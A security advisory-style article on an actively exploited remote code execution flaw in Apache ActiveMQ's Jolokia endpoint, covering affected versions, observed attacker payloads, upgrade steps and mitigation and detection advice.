Apache ActiveMQ RCE CVE-2026-34197 Is Being Actively Exploited — Upgrade to 6.2.3 or 5.19.4 Now
A 13-year-old remote code execution flaw in Apache ActiveMQ Classic has been added to CISA's Known Exploited Vulnerabilities catalog. Threat actors are chaining it with ransomware and cryptominers across exposed brokers worldwide.
A remote code execution vulnerability in Apache ActiveMQ Classic that sat undetected for 13 years has been added to CISA’s Known Exploited Vulnerabilities catalog. CVE-2026-34197 carries a CVSS score of 8.8. Federal agencies have until April 30 to patch. Everyone else should move today.
What the Vulnerability Does
The flaw lives in ActiveMQ’s Jolokia management API endpoint. An unauthenticated attacker can invoke a management operation over the API that tricks the broker into fetching a remote configuration file — and then executing arbitrary OS commands with broker privileges. No authentication is required if the Jolokia endpoint is exposed on the network, which is its default configuration in many on-premises deployments.
Researchers at Horizon3.ai confirmed that exploitation is trivially reproducible. A working public proof-of-concept has been circulating since early April.
Affected Versions
- Apache ActiveMQ Classic versions before 5.19.4
- Apache ActiveMQ 6.x versions before 6.2.3
If you’re running anything older, assume you are vulnerable.
What Attackers Are Doing With It
Multiple threat actor groups began exploiting CVE-2026-34197 in early April. Initial access is typically established within minutes of scanning; observed post-exploitation payloads include ransomware droppers, XMRig cryptocurrency miners, and persistent SSH backdoors. Some campaigns have been tracked to state-aligned infrastructure.
ActiveMQ brokers are common in enterprise Java environments — financial services, logistics, healthcare. Any public-facing broker running a vulnerable version is a high-value target right now.
Patch Instructions
For users on the 5.x branch:
# Upgrade to 5.19.4
mvn dependency:resolve -Dartifact=org.apache.activemq:activemq-broker:5.19.4For users on the 6.x branch: Upgrade to 6.2.3 — the minimum safe release on this line.
If an immediate upgrade is not possible, disable the Jolokia endpoint in activemq.xml by removing or restricting the <managementContext> configuration, and block external access to port 8161 at the firewall level.
Why This Took 13 Years to Surface
A researcher working with Claude AI traced the root cause to a design flaw introduced in 2013 — an improper input validation pathway in the OpenWire protocol’s deserialization logic that was compounded by the Jolokia API’s default permissive configuration. The combination was never flagged in previous audits because neither component appeared dangerous in isolation.
The disclosure and a detailed writeup were published by Help Net Security in early April. CISA added the CVE to the KEV catalog this week as in-the-wild exploitation accelerated.
What to Do Right Now
- Identify all ActiveMQ instances in your environment — including those buried in middleware layers or service meshes.
- Upgrade to 5.19.4 or 6.2.3 immediately.
- If you cannot patch, restrict Jolokia access via firewall rules and disable remote configuration fetching.
- Hunt for indicators of compromise: check for unexpected child processes spawned by the ActiveMQ JVM and unusual outbound connections on port 8161.
The patch is straightforward. The exposure window is closing fast — but not fast enough if you’re still running a vulnerable broker facing the internet.